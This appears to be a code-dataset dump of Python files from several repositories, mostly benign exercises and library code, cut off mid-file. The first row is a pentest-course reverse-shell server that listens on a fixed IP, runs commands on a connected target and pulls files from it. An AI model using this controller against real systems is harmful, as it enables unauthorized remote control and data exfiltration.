blob_id string | repo_name string | path string | length_bytes int64 | score float64 | int_score int64 | text string |
|---|---|---|---|---|---|---|
0b66c882cb4dd7770977952cd2e27984be13f729 | yosef8234/test | /python_offsec_pentest/Module 2/Data Exfiltration Server- TCP Reverse Shell.py | 2,110 | 3.84375 | 4 | # Python For Offensive PenTest: A Complete Practical Course By Hussam Khrais - All rights reserved
# Follow me on LinkedIn https://jo.linkedin.com/in/python2
import socket
import os # Needed for file operation
# In the transfer function, we first create a trivial file called "test.png" as a file holder just to hold the
# received bytes , then we go into infinite loop and store the received data into our file holder "test.png", however
# If the requested file doesn't exist or if we reached the end of the file then we will break the loop
# note that we could know the end of the file, if we received the "DONE" tag from the target side
# Keep in mind that you can enhance the code and dynamically change the test.png to other file extension based on the user input
def transfer(conn,command):
conn.send(command)
f = open('/root/Desktop/test.png','wb')
while True:
bits = conn.recv(1024)
if 'Unable to find out the file' in bits:
print '[-] Unable to find out the file'
break
if bits.endswith('DONE'):
print '[+] Transfer completed '
f.close()
break
f.write(bits)
def connect():
    # Listen for a single reverse-shell connection from the target and run
    # an interactive command loop against it (Python 2).
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("10.10.10.100", 8080))  # attacker IP/port the target dials back to
    s.listen(1)
    print '[+] Listening for incoming TCP connection on port 8080'
    conn, addr = s.accept()
    print '[+] We got a connection from: ', addr
    while True:
        command = raw_input("Shell> ")
        if 'terminate' in command:
            # Tell the target to exit, then drop the connection.
            conn.send('terminate')
            conn.close()
            break
        # "grab*<path>" switches to file-transfer mode, e.g.
        #   grab*C:\Users\Hussam\Desktop\photo.jpeg
        elif 'grab' in command:
            transfer(conn, command)
        else:
            # Any other input is executed remotely; print its output.
            # NOTE(review): a single 1024-byte recv may truncate long
            # command output -- confirm acceptable for this exercise.
            conn.send(command)
            print conn.recv(1024)
def main ():
    # Entry point: start listening for the reverse-shell connection.
    connect()
main()
|
6ee2229642cfb4fb509764e591cd25108c8efa3e | luciopalm/Exerciciospython_C_video | /pacote download/exercícios/ex008.py | 120 | 3.578125 | 4 | n1 = int(input('Digite um valor:'))
# Show the value converted to metres, centimetres and millimetres.
print('metros:{} \ncentímetros:{} \nmilímetros:{}'.format(n1,(n1*100),(n1*1000)))
|
3c63ed3368a4a71fcf9615329a3795c67e3f0c11 | obezpalko/smallprogs | /covid-distance/main.py | 428 | 3.625 | 4 | #!/usr/bin/en python
from math import sqrt
from scipy.spatial import distance
# Four points forming a regular tetrahedron with unit edge length -- the
# maximum number of people who can all stay exactly one distance-unit apart.
a = (0, 0, 0)
b = (1, 0, 0)
c = (1/2, sqrt(3)/2, 0)
d = (1/2, 1/(2*sqrt(3)), -sqrt(2/3))
# Every pairwise distance below should print as 1.0 (up to float rounding).
print(f"a->b: {distance.euclidean(a, b)}")
print(f"a->c: {distance.euclidean(a, c)}")
print(f"a->d: {distance.euclidean(a, d)}")
print(f"b->c: {distance.euclidean(b, c)}")
print(f"b->d: {distance.euclidean(b, d)}")
print(f"c->d: {distance.euclidean(c, d)}")
|
fbbace29d9e830d1312cb1c3721faa88b5c40b07 | tashakim/puzzles_python | /graph/sort.py | 4,683 | 4.34375 | 4 | #!/usr/bin/python3
class InvalidInputException(Exception):
    """Raised by the sorting routines when the input list is invalid."""

    def __init__(self, value):
        # Keep the offending value around for inspection by callers.
        self.value = value

    def __str__(self):
        # Render via %r so string values keep their quotes in messages.
        return '%r' % (self.value,)
def merge_sort(array):
    """merge_sort: int array -> int array
    Purpose: Sort the input array of integers in descending order,
    in place, using recursive merge sort, and return it.
    Examples: merge_sort([4,5,1,3,2]) -> [5,4,3,2,1]
    merge_sort([1,2,4]) -> [4,2,1]
    Throws: InvalidInputException if list is None.
    This algorithm runs in worst case O(n log(n)) time.
    """
    checkValidInput(array)
    if len(array) <= 1:
        # Empty or single-element input is already sorted.
        return array
    mid = len(array) // 2
    # Sort copies of the two halves recursively.
    left_half = merge_sort(array[:mid])
    right_half = merge_sort(array[mid:])
    # Merge the sorted halves back into `array`, largest first.
    li = ri = write = 0
    while li < len(left_half) and ri < len(right_half):
        if left_half[li] > right_half[ri]:
            array[write] = left_half[li]
            li += 1
        else:
            array[write] = right_half[ri]
            ri += 1
        write += 1
    # Copy whatever remains of either half.
    for leftovers in (left_half[li:], right_half[ri:]):
        for value in leftovers:
            array[write] = value
            write += 1
    return array
def quick_sort(array):
    """quick_sort: int array -> int array
    Purpose: Return a new list with the integers of the input sorted in
    descending order using quicksort (three-way partition around the
    first element).
    Examples: quick_sort([4,5,1,3,2]) -> [5,4,3,2,1]
    quick_sort([1,2,4]) -> [4,2,1]
    Throws: InvalidInputException if list is None
    This algorithm runs in expected case O(n log(n)) time.
    """
    checkValidInput(array)
    if len(array) <= 1:
        # Nothing to sort.
        return array
    # Pivot choice: the first element (any element would do).
    pivot = array[0]
    # Three-way partition relative to the pivot.
    below = [x for x in array if x < pivot]
    same = [x for x in array if x == pivot]
    above = [x for x in array if x > pivot]
    # Descending order: larger elements first.
    return quick_sort(above) + same + quick_sort(below)
def radix_sort(array):
    """radix_sort: int array -> int array
    Purpose: Sort the input array of integers in descending order
    using the radixsort algorithm.
    Examples: radix_sort([4,5,1,3,2]) -> [5,4,3,2,1]
    radix_sort([1,2,4]) -> [4,2,1]
    Throws: InvalidInputException if list is None.
    This algorithm runs in worst case O(dn) time, where
    d is the number of digits in the largest number.
    """
    checkValidInput(array)
    if len(array)<=1:
        return array
    # Split into strictly positive and strictly negative values; zeros are
    # re-inserted between the two groups at the end.
    positive_array = list(filter((0).__lt__, array))
    negative_array = list(filter((0).__gt__, array))
    negative_array = [-x for x in negative_array]  # sort magnitudes instead
    arrs = [positive_array, negative_array]
    for x in arrs:
        if len(x) > 0:
            max_element = max(x)
            digit = 1
            # One counting pass per decimal digit (LSD radix sort); the
            # helper must be a *stable* descending pass for this to work.
            while max_element // digit > 0:
                radixSortHelper(x, digit)
                digit *= 10
    # Negate back and reverse: descending magnitudes become descending
    # negative values (e.g. [5, 3] -> [-3, -5]).
    negative_array = [-x for x in negative_array][::-1]
    if (0 in array):
        num = array.count(0)
        return positive_array + [0]*num + negative_array
    return positive_array + negative_array
def radixSortHelper(array, digit):
    """radixSortHelper: int array, int digit
    Purpose: One *stable* counting-sort pass over `array`, ordering the
    elements in descending order of the decimal digit selected by `digit`
    (1 = ones, 10 = tens, ...).  Called repeatedly by radix_sort().

    Bug fix: the old implementation ran an ascending stable pass and then
    wrote the output reversed (array[i] = output[n-i-1]).  Reversing
    destroys stability between passes, which LSD radix sort depends on,
    so multi-digit input such as [21, 23] came out ascending.  This
    version uses suffix counts to produce a directly descending, stable
    pass and copies the output straight back.
    """
    n = len(array)
    output = [0] * n
    count = [0] * 10
    # Histogram of the selected digit.
    for i in range(n):
        count[(array[i] // digit) % 10] += 1
    # Suffix sums: count[d] becomes the number of elements whose digit is
    # >= d, i.e. one past the last output slot reserved for digit d.
    for i in range(8, -1, -1):
        count[i] += count[i + 1]
    # Walk the input backwards, filling each digit's slot from its end so
    # equal digits keep their relative order (stability).
    i = n - 1
    while i >= 0:
        index = (array[i] // digit) % 10
        output[count[index] - 1] = array[i]
        count[index] -= 1
        i -= 1
    for i in range(n):
        array[i] = output[i]
def checkValidInput(array):
    """checkValidInput: int array
    Purpose: Throws InvalidInputException if the input list is None,
    otherwise does nothing.  (An empty list is valid input.)
    """
    if array is None:
        # Bug fix: the old message said 'List cannot be empty', but this
        # check rejects None only -- empty lists sort fine.
        raise InvalidInputException('List cannot be None')
    return
|
7c6e4a2776ecb24c5ff6e2209471e6aea5765ffe | ghostlhq/Python-Data-mining-Tutorial | /Week-02/Example-02/全唐诗文本整理.py | 3,849 | 3.625 | 4 | """
全唐诗文本整理
Version: 0.1
Author: 长行
"""
import re
if __name__ == "__main__":
    # Read the raw "Complete Tang Poems" text corpus.
    with open("全唐诗.txt", encoding="UTF-8") as file:
        lines = file.readlines()
    print("总行数:", len(lines))
    poem_list = list()
    reading = False  # start flag (avoids emitting a record the first time a title line is seen)
    book_num = 0  # volume number
    poem_num = 0  # poem number within the volume
    title = None  # poem title
    author = "未知"  # author (default: "unknown")
    content = ""  # poem body text
    for line in lines:
        # Data cleaning: strip newlines/spaces and volume headings written
        # with Chinese numerals.
        line = line.replace("\n", "").replace(" ", "").replace(" ", "")
        line = re.sub("卷[一二三四五六七八九十百]+", "", line)
        line = re.sub("第[一二三四五六七八九十百]+卷", "", line)
        # Skip empty lines (including lines that became empty after cleaning).
        if len(line) == 0:
            continue
        # Skip boilerplate lines with no actual content (proofreader credit,
        # copyright notice, contact address).
        if "知古斋主精校" in line or "版权所有" in line or "web@guoxue.com" in line:
            continue
        # Title lines look like 卷<digits>_<digits>.
        if re.search("卷[0-9]+_[0-9]+", line):
            # Flush the previous poem before starting a new one.
            if reading:
                poem_list.append({
                    "卷编号": book_num,
                    "诗编号": poem_num,
                    "标题": title,
                    "作者": author,
                    "内容": content
                })
                print(book_num, poem_num, title, author, content)
            else:
                reading = True
            # Title line: parse volume and poem numbers.
            if book_regex := re.search("(?<=卷)[0-9]+(?=_)", line):
                book_num = int(book_regex.group())  # read the volume number
            else:
                book_num = 0
                print("未识别卷编号")
            if poem_regex := re.search("(?<=_)[0-9]+", line):
                poem_num = int(poem_regex.group())  # read the poem number
            else:
                poem_num = 0
                print("未识别诗编号")
            # Title line: the title is the text between 【 and 】.
            if title_regex := re.search("(?<=【)[^】]+(?=】)", line):
                title = title_regex.group()  # read the title
            else:
                title = None
                print("未识别标题")
            # Title line: the author is whatever Chinese text remains after
            # removing the numbering and the bracketed title.
            line = re.sub("卷[0-9]+_[0-9]+", "", line)
            line = re.sub("【[^】]+】", "", line)
            if author_regex := re.search("[\u4e00-\u9fa5]+", line):
                author = author_regex.group()
            else:
                author = "未知"
            # Reset the poem body for the new poem.
            content = ""
        # Ordinary body lines.
        else:
            # Clean the body line.
            line = line.replace("¤", "。")  # replace the bad full stop with the standard one
            line = re.sub("(?<=[),。])[知古斋主]$", "", line)  # drop the proofreader's name
            if not re.search("[,。?!]", line):
                # A punctuation-free line right after the title (no author,
                # no content yet) is taken as the author's name.
                if author == "未知" and content == "":
                    author_regex = re.search("[\u4e00-\u9fa5]+", line)
                    author = author_regex.group()
            else:
                content += line
    # Flush the final poem after the loop ends.
    poem_list.append({
        "卷编号": book_num,
        "诗编号": poem_num,
        "标题": title,
        "作者": author,
        "内容": content
    })
    # Write the cleaned corpus out, one comma-separated poem per line.
    with open("全唐诗(清洗后).txt", "w+", encoding="UTF-8") as file:
        for poem_item in poem_list:
            file.write(",".join([str(poem_item["卷编号"]), str(poem_item["诗编号"]), poem_item["标题"], poem_item["作者"],
                                 poem_item["内容"]]) + "\n")
|
d020cc3833470a58875df9cbf74b6598138bb2ae | despo/learn_python_the_hard_way | /exercises/ex33.py | 497 | 4.21875 | 4 | def add_numbers_to_list(size, increment=1):
numbers = range(0,size)
for i in numbers:
print "At the top is %d" % i
print "At the bottom i is %d" % i
def print_numbers():
    # Prints the module-level `numbers` list.  NOTE(review): this reads the
    # *global* list, not the local one built inside add_numbers_to_list --
    # confirm the exercise intends that.
    print "The numbers:"
    for num in numbers:
        print num
# extra credit 2
# NOTE(review): add_numbers_to_list assigns a *local* `numbers`, so these
# calls never populate the global list that print_numbers reads -- confirm
# that the empty output below is what the exercise expects.
numbers = []
add_numbers_to_list(6)
print_numbers()
numbers = []
add_numbers_to_list(3)
print_numbers()
# extra credit 4
numbers = []
add_numbers_to_list(3, 2)
print_numbers()
numbers = []
add_numbers_to_list(15, 3)
print_numbers()
|
9cf7ab1a716af574f531f6b9c4f8f9f21989209c | timebird7/Solve_Problem | /SWEA/4874_Forth.py | 1,455 | 3.671875 | 4 | class Stack:
def __init__(self):
    # Fixed-capacity stack: preallocated storage plus a top-of-stack index.
    self.stack = [0]*300
    self.pnt = 0
def push(self, x):
    # Store x at the current top and advance the pointer.
    # NOTE(review): no overflow check -- assumes at most 300 items.
    self.stack[self.pnt] = x
    self.pnt += 1
def pop(self):
    # Remove and return the top element; underflow yields None
    # instead of raising.
    if not self.pnt:
        return None
    self.pnt -= 1
    return self.stack[self.pnt]
def isEmpty(self):
    # True when no elements are stored.
    return self.pnt == 0
def peek(self):
    # Return the top element without removing it; None when empty.
    if not self.pnt:
        return None
    return self.stack[self.pnt - 1]
TC = int(input())
for tc in range(TC):
    # One Forth-style postfix expression per test case.
    forth = input().split()
    stack = Stack()
    for c in forth:
        # Apply an operator only when two operands are available; operand
        # order is b (pushed first) <op> a (pushed last).
        if c == '+' and stack.pnt >= 2:
            a = stack.pop()
            b = stack.pop()
            stack.push(b+a)
        elif c == '-' and stack.pnt >= 2:
            a = stack.pop()
            b = stack.pop()
            stack.push(b-a)
        elif c == '*' and stack.pnt >= 2:
            a = stack.pop()
            b = stack.pop()
            stack.push(b*a)
        elif c == '/' and stack.pnt >= 2:
            a = stack.pop()
            b = stack.pop()
            stack.push(b//a)
        elif c == '.':
            # '.' terminates the expression; valid only if exactly one
            # value remains on the stack, otherwise mark an error.
            if stack.pnt == 1:
                break
            else:
                stack.push('error')
        elif stack.pnt < 2 and (c == '+' or c == '-' or c == '*' or c == '/'):
            # Operator with too few operands.
            stack.push('error')
            break
        else:
            # Anything else is a number literal.
            stack.push(int(c))
    print(f'#{tc+1} {stack.peek()}')
|
c538ea089503a8eca4018706238e45ee2e6940ee | LizaShengelia/100-Days-of-Code--Python | /Day2.Exercise3.py | 197 | 3.5625 | 4 | age = input("What is your current age?")
new_age = 90 - int(age)  # years remaining assuming a 90-year lifespan
x = int(new_age) * 365  # days remaining
y = int(new_age) * 52   # weeks remaining
z = int(new_age) * 12   # months remaining
print(f"You have {x} days, {y} weeks, and {z} months left.")
|
def2342ed42fc6faab47d28a12c56fed4dbe3714 | bweiz/Python | /PokerHands.py | 2,396 | 3.984375 | 4 | #-------------------------------------------------------------
# Benton Weizenegger
# 10/3/17
# Lab Section 2
# Program 2
#-------------------------------------------------------------
def evaluate(hand, poker_output):
    # Return the name of the best category the 3-card hand matches,
    # trying categories from strongest to weakest.  `poker_output` is
    # accepted for interface compatibility but is not used here.
    for matches, label in ((Flush, "Flush"),
                           (Three_of_a_Kind, "Three of a kind"),
                           (Two_of_a_Kind, "Two of a Kind"),
                           (Nothing, "Nothing")):
        if matches(hand):
            return label
def Flush(hand):
    # A three-card flush: all three cards share one suit.
    first, second, third = hand[0][1], hand[1][1], hand[2][1]
    if first == second == third:
        return True
def Three_of_a_Kind(hand):
    # Three of a kind: all three cards share one rank.
    ranks = (hand[0][0], hand[1][0], hand[2][0])
    if ranks[0] == ranks[1] == ranks[2]:
        return True
def Two_of_a_Kind(hand):
    # Two of a kind: at least one pair of matching ranks among the cards.
    a, b, c = hand[0][0], hand[1][0], hand[2][0]
    if a == b or a == c or b == c:
        return True
def Nothing(hand):
    """Return True when the hand is neither a flush, nor three of a kind,
    nor a pair; otherwise fall through (returning None).

    Bug fix: the original pair check read
        if not hand[0][0] == hand[1][0] or hand[0][0] == hand[2][0] or ...
    so `not` bound only to the first comparison and the test was True
    whenever any of the last two pairs matched.  The negation now wraps
    the whole pair test, mirroring Two_of_a_Kind.
    """
    if not hand[0][1] == hand[1][1] == hand[2][1]:
        return True
    if not hand[0][0] == hand[1][0] == hand[2][0]:
        return True
    if not (hand[0][0] == hand[1][0] or hand[0][0] == hand[2][0] or hand[1][0] == hand[2][0]):
        return True
def print_hand(hand_as_list, poker_output):
    # Writes the three cards and the hand's evaluation to poker_output.
    cardnum = 1  # Number to print in output function
    poker_output.write("Poker Hand \n" + "---------- \n")
    for hand in hand_as_list:
        poker_output.write("Card " + str(cardnum) + ": " + hand[0] + " of " + hand[1] + "\n")
        # NOTE(review): rebuilds `hand` as a tuple of copies of all three
        # cards on every iteration; only the value left after the loop is
        # passed to evaluate() below -- confirm this shadowing is intended.
        hand = hand_as_list[0][0:], hand_as_list[1][0:], hand_as_list[2][0:]
        cardnum += 1
    poker_output.write("\n")
    poker_output.write("Poker hand Evaluation: " + str(evaluate(hand, poker_output)) + "\n")
    poker_output.write("\n")
# --------------------------------------
# Do not change anything below this line
# --------------------------------------
def main(poker_input, poker_output, cards_in_hand):
    # Reads one hand per line ("rank suit rank suit ..."), then prints and
    # evaluates each hand.  (Marked "do not change" in the original file;
    # only comments added here.)
    for hand in poker_input:
        hand = hand.split()
        hand_as_list = []
        for i in range(cards_in_hand):
            # Consume tokens two at a time: [rank, suit].
            hand_as_list.append([hand[0], hand[1]])
            hand = hand[2:]
        print_hand(hand_as_list, poker_output)
        evaluate(hand_as_list, poker_output)
# --------------------------------------
poker_input = open("poker.in", "r")
poker_output = open("poker.out", "w")
main(poker_input, poker_output, 3)
poker_input.close()
poker_output.close()
|
d579936f20417376bf36e190a77a43eff309ec9c | aCoffeeYin/pyreco | /repoData/DasIch-brownie/allPythonContent.py | 251,289 | 3.515625 | 4 | __FILENAME__ = abstract
# coding: utf-8
"""
brownie.abstract
~~~~~~~~~~~~~~~~
Utilities to deal with abstract base classes.
.. versionadded:: 0.2
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
try:
    from abc import ABCMeta
except ImportError:
    # Python builds without the abc module: provide a no-op stand-in so
    # the metaclasses below still work (registration simply does nothing).
    class ABCMeta(type):
        """Dummy :class:`abc.ABCMeta` implementation which does nothing."""
        def register(self, subclass):
            pass
class VirtualSubclassMeta(type):
    """
    A metaclass which allows you to easily define abstract super classes,
    simply inherit from this metaclass and set the
    :attr:`virtual_superclasses` attribute to an iterable:

    >>> from brownie.abstract import ABCMeta, VirtualSubclassMeta
    >>>
    >>> class VirtualBaseClass(object):
    ...     __metaclass__ = ABCMeta
    >>>
    >>> class VirtualSubclass(object):
    ...     __metaclass__ = VirtualSubclassMeta
    ...
    ...     virtual_superclasses = (VirtualBaseClass, )
    >>>
    >>> issubclass(VirtualSubclass, VirtualBaseClass)
    True
    """
    def __init__(self, name, bases, attributes):
        type.__init__(self, name, bases, attributes)
        # Register the freshly created class with every declared virtual
        # superclass (Python 2 metaclass protocol).
        self._register_superclasses(attributes.get('virtual_superclasses', ()))

    def _register_superclasses(self, superclasses):
        for cls in superclasses:
            if isinstance(cls, ABCMeta):
                cls.register(self)
            # Recurse so transitively declared virtual bases register too.
            if hasattr(cls, 'virtual_superclasses'):
                self._register_superclasses(cls.virtual_superclasses)
class AbstractClassMeta(ABCMeta, VirtualSubclassMeta):
    """
    A metaclass for abstract base classes which are also virtual subclasses.
    Simply set :attr:`virtual_subclasses` to an iterable of classes your class
    is supposed to virtually inherit from:

    >>> from brownie.abstract import ABCMeta, AbstractClassMeta, \\
    ...     VirtualSubclassMeta
    >>> class Foo(object):
    ...     __metaclass__ = ABCMeta
    >>>
    >>> class Bar(object):
    ...     __metaclass__ = AbstractClassMeta
    ...
    ...     virtual_superclasses = (Foo, )
    >>>
    >>> class Baz(object):
    ...     __metaclass__ = VirtualSubclassMeta
    ...
    ...     virtual_superclasses = (Bar, )
    >>>
    >>> issubclass(Baz, Foo)
    True
    >>> issubclass(Baz, Bar)
    True

    .. note::
        All classes could use :class:`AbstractClassMeta` as `__metaclass__`
        and the result would be the same, the usage here is just to demonstrate
        the specific problem which is solved.
    """
    # No body: behaviour comes entirely from combining the two metaclasses.
__all__ = ['ABCMeta', 'VirtualSubclassMeta', 'AbstractClassMeta']
########NEW FILE########
__FILENAME__ = caching
# coding: utf-8
"""
brownie.caching
~~~~~~~~~~~~~~~
Caching utilities.
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
from functools import wraps
from brownie.datastructures import OrderedDict, Counter, missing
class cached_property(object):
    """
    Descriptor that computes the value once via the given `getter` and then
    stores it on the instance, shadowing itself on later attribute access.

    :param doc: Optional docstring which is used instead of the `getter`\s
                docstring.
    """
    def __init__(self, getter, doc=None):
        self.getter = getter
        self.__module__ = getter.__module__
        self.__name__ = getter.__name__
        self.__doc__ = doc or getter.__doc__

    def __get__(self, obj, type=None):
        # Class-level access returns the descriptor itself.
        if obj is None:
            return self
        result = self.getter(obj)
        # Cache on the instance; subsequent lookups bypass the descriptor.
        obj.__dict__[self.__name__] = result
        return result
class CacheBase(object):
    """
    Base class for all caches, which is supposed to be used as a mixin.
    """
    @classmethod
    def decorate(cls, maxsize=float('inf')):
        """
        Returns a decorator which can be used to create functions whose
        results are cached.
        In order to clear the cache of the decorated function call `.clear()`
        on it.
        ::
            @CacheBase.decorate(maxsize=1024) # items stored in the cache
            def foo(a, b):
                return a + b # imagine a very expensive operation here
        """
        def decorator(function, _maxsize=maxsize):
            cache = cls(maxsize=maxsize)
            @wraps(function)
            def wrapper(*args, **kwargs):
                # Cache key: positional args plus keyword items in sorted
                # order, so f(a=1, b=2) and f(b=2, a=1) share one entry.
                # (Python 2: dict.iteritems.)
                key = args
                if kwargs:
                    key += tuple(sorted(kwargs.iteritems()))
                try:
                    result = cache[key]
                except KeyError:
                    # Miss: compute and remember the result.
                    result = function(*args, **kwargs)
                    cache[key] = result
                return result
            wrapper.clear = cache.clear
            return wrapper
        return decorator
class LRUCache(OrderedDict, CacheBase):
    """
    :class:`~brownie.datastructures.OrderedDict` based cache which removes the
    least recently used item once `maxsize` is reached.

    .. note:: The order of the dict is changed each time you access the dict.
    """
    def __init__(self, mapping=(), maxsize=float('inf')):
        OrderedDict.__init__(self, mapping)
        # Maximum number of items held before eviction kicks in.
        self.maxsize = maxsize

    def __getitem__(self, key):
        # A successful lookup marks the key as most recently used.
        self.move_to_end(key)
        return OrderedDict.__getitem__(self, key)

    def __setitem__(self, key, value):
        # Only make room when inserting a *new* key.  Bug fix: the old code
        # popped the LRU entry even when merely overwriting an existing key,
        # silently evicting an unrelated item.
        if key not in self and len(self) >= self.maxsize:
            self.popitem(last=False)
        OrderedDict.__setitem__(self, key, value)

    def __repr__(self):
        return '%s(%s, %f)' % (
            self.__class__.__name__, dict.__repr__(self), self.maxsize
        )
class LFUCache(dict, CacheBase):
    """
    :class:`dict` based cache which removes the least frequently used item once
    `maxsize` is reached.
    """
    def __init__(self, mapping=(), maxsize=float('inf')):
        dict.__init__(self, mapping)
        # Maximum number of items held before eviction kicks in.
        self.maxsize = maxsize
        # Tracks how often each key has been read via __getitem__.
        self.usage_counter = Counter()

    def __getitem__(self, key):
        value = dict.__getitem__(self, key)
        self.usage_counter[key] += 1
        return value

    def __setitem__(self, key, value):
        dict.__setitem__(self, key, value)
        overflow = len(self) - self.maxsize
        if overflow > 0:
            # Evict the *least* frequently used entries.  Bug fix: the old
            # code used most_common(overflow), which returns the *most*
            # used keys first and therefore evicted the hottest entries.
            # NOTE(review): keys that were never read have no counter entry
            # and are never considered for eviction; this mirrors the
            # original behaviour -- confirm it is intended.
            by_usage = sorted(self.usage_counter.items(),
                              key=lambda item: item[1])
            for victim, _ in by_usage[:int(overflow)]:
                del self[victim]

    def __delitem__(self, key):
        dict.__delitem__(self, key)
        del self.usage_counter[key]

    def pop(self, key, default=missing):
        try:
            value = self[key]
            del self[key]
            return value
        except KeyError:
            if default is missing:
                raise
            return default

    def setdefault(self, key, default=None):
        if key not in self:
            self[key] = default
        return self[key]

    def popitem(self):
        # Bug fix: the old code called dict.__popitem__(), which does not
        # exist; dict.popitem() is the intended method.
        item = dict.popitem(self)
        del self.usage_counter[item[0]]
        return item

    def __repr__(self):
        return '%s(%s, %f)' % (
            self.__class__.__name__, dict.__repr__(self), self.maxsize
        )
#: A memoization decorator, which uses a simple dictionary of infinite size as
#: cache::
#:
#:     @memoize
#:     def foo(a, b):
#:         return a + b
#:
#: .. versionadded:: 0.5
# Creates a fresh dict+CacheBase subclass per function, so every memoized
# function owns an isolated, unbounded cache.
memoize = lambda func: type(
    '_MemoizeCache', (dict, CacheBase), {}
).decorate()(func)

__all__ = ['cached_property', 'LRUCache', 'LFUCache', 'memoize']
########NEW FILE########
__FILENAME__ = context
# coding: utf-8
"""
brownie.context
~~~~~~~~~~~~~~~
Utilities to deal with context managers.
.. versionadded:: 0.6
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
from __future__ import with_statement
import thread
import threading
from operator import itemgetter
from itertools import count
from brownie.caching import LFUCache
def _make_stack_methods(name, lockname, stackname):
    # Factory producing a (push, pop) method pair for a named context stack;
    # both generated methods acquire the lock attribute `lockname` and
    # operate on the context object stored at attribute `stackname`.
    def push(self, obj):
        """
        Pushes the given object onto the %s stack.
        """
        with getattr(self, lockname):
            self._add_object(getattr(self, stackname), obj)
            self._cache.clear()

    def pop(self):
        """
        Pops and returns an object from the %s stack.
        """
        with getattr(self, lockname):
            stack = self._get_objects(getattr(self, stackname))
            if stack is None:
                raise RuntimeError('no objects on stack')
            self._cache.clear()
            return stack.pop()[1]

    # Specialise the generic names/docstrings for this stack's name.
    push.__name__ = 'push_' + name
    push.__doc__ = push.__doc__ % name
    pop.__name__ = 'pop_' + name
    pop.__doc__ = pop.__doc__ % name
    return push, pop
class ContextStackManagerBase(object):
    """
    Helper which manages context dependant stacks.
    A common API pattern is using context managers to change options; those
    options are internally stored on a stack.
    However larger applications have multiple execution contexts such as
    processes, threads and/or coroutines/greenthreads and such an API becomes
    a problem as each modification of the stack becomes visible to every
    execution context.
    This helper allows you to make stack operations local to the current
    execution context, ensuring that the stack remains the same in other
    contexts unless you want it to change there.
    As applications tend to have very different requirements and use different
    contexts each is implemented in a separate mixin, this way it easily
    possible to create a `ContextStackManager` for your needs.
    Assuming your application uses threads and eventlet for greenthreads you
    would create a `ContextStackManager` like this::

        class ContextStackManager(
            ContextStackManagerEventletMixin,
            ContextStackManagerThreadMixin,
            ContextStackManagerBase
        ):
            pass

    Greenthreads are executed in a thread, whereas threads are executed in
    the application thread (handled by the base class) this is why
    `ContextStackManager` inherits from these classes exactly in this order.
    Currently available mixins are:

    - :class:`ContextStackManagerThreadMixin`
    - :class:`ContextStackManagerEventletMixin`
    """
    def __init__(self, _object_cache_maxsize=256):
        self._application_stack = []
        # Caches flattened stacks per execution-context ident tuple.
        self._cache = LFUCache(maxsize=_object_cache_maxsize)
        # Context-local objects contributed by the mixins, in MRO order.
        self._contexts = []
        # Monotonically increasing sequence numbers ordering pushed items
        # across the different stacks (Python 2: .next of itertools.count).
        self._stackop = count().next

    def _get_ident(self):
        # Mixins extend this tuple with thread/coroutine identifiers.
        return ()

    def _make_item(self, obj):
        return self._stackop(), obj

    def _get_objects(self, context):
        return getattr(context, 'objects', None)

    def _add_object(self, context, obj):
        item = self._make_item(obj)
        objects = self._get_objects(context)
        if objects is None:
            # First push for this context: create the list lazily.
            context.objects = [item]
        else:
            objects.append(item)

    def iter_current_stack(self):
        """
        Returns an iterator over the items in the 'current' stack, ordered
        from top to bottom.
        """
        ident = self._get_ident()
        objects = self._cache.get(ident)
        if objects is None:
            # Flatten application stack plus every context-local stack,
            # newest item first, then cache the result for this ident.
            objects = self._application_stack[:]
            for context in self._contexts:
                objects.extend(getattr(context, 'objects', ()))
            objects.reverse()
            self._cache[ident] = objects = map(itemgetter(1), objects)
        return iter(objects)

    def push_application(self, obj):
        """
        Pushes the given object onto the application stack.
        """
        self._application_stack.append(self._make_item(obj))
        self._cache.clear()

    def pop_application(self):
        """
        Pops and returns an object from the application stack.
        """
        if not self._application_stack:
            raise RuntimeError('no objects on application stack')
        self._cache.clear()
        return self._application_stack.pop()[1]
class ContextStackManagerThreadMixin(object):
    """
    A :class:`ContextStackManagerBase` mixin providing thread context support.
    """
    def __init__(self, *args, **kwargs):
        super(ContextStackManagerThreadMixin, self).__init__(*args, **kwargs)
        self._thread_context = threading.local()
        self._contexts.append(self._thread_context)
        self._thread_lock = threading.Lock()

    def _get_ident(self):
        # Extend the ident tuple with the current thread id so cached
        # stacks are keyed per thread.
        return super(
            ContextStackManagerThreadMixin,
            self
        )._get_ident() + (thread.get_ident(), )

    push_thread, pop_thread = _make_stack_methods(
        'thread', '_thread_lock', '_thread_context'
    )
class ContextStackManagerEventletMixin(object):
    """
    A :class:`ContextStackManagerBase` mixin providing coroutine/greenthread
    context support using eventlet_.

    .. _eventlet: http://eventlet.net
    """
    def __init__(self, *args, **kwargs):
        super(ContextStackManagerEventletMixin, self).__init__(*args, **kwargs)
        # Import lazily so eventlet is only required when this mixin is used.
        try:
            from eventlet.corolocal import local
            from eventlet.semaphore import BoundedSemaphore
        except ImportError:
            raise RuntimeError(
                'the eventlet library is required for %s' %
                self.__class__.__name__
            )
        self._coroutine_context = local()
        self._contexts.append(self._coroutine_context)
        self._coroutine_lock = BoundedSemaphore()

    def _get_ident(self):
        from eventlet.corolocal import get_ident
        # Extend the ident tuple with the current greenthread id.
        return super(
            ContextStackManagerEventletMixin,
            self
        )._get_ident() + (get_ident(), )

    push_coroutine, pop_coroutine = _make_stack_methods(
        'coroutine', '_coroutine_lock', '_coroutine_context'
    )
__all__ = [
'ContextStackManagerBase', 'ContextStackManagerThreadMixin',
'ContextStackManagerEventletMixin'
]
########NEW FILE########
__FILENAME__ = iterators
# coding: utf-8
"""
brownie.datastructures.iterators
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
from collections import deque
class PeekableIterator(object):
    """
    An iterator which allows peeking.

    .. versionadded:: 0.6
    """
    def __init__(self, iterable):
        self.iterator = iter(iterable)
        # Items already pulled from the underlying iterator by peek() but
        # not yet handed out by next().
        self.remaining = deque()

    def next(self):
        # Python 2 iterator protocol; serve buffered items first.
        if self.remaining:
            return self.remaining.popleft()
        return self.iterator.next()

    def peek(self, n=1):
        """
        Returns the next `n` items without consuming the iterator, if the
        iterator has less than `n` items these are returned.
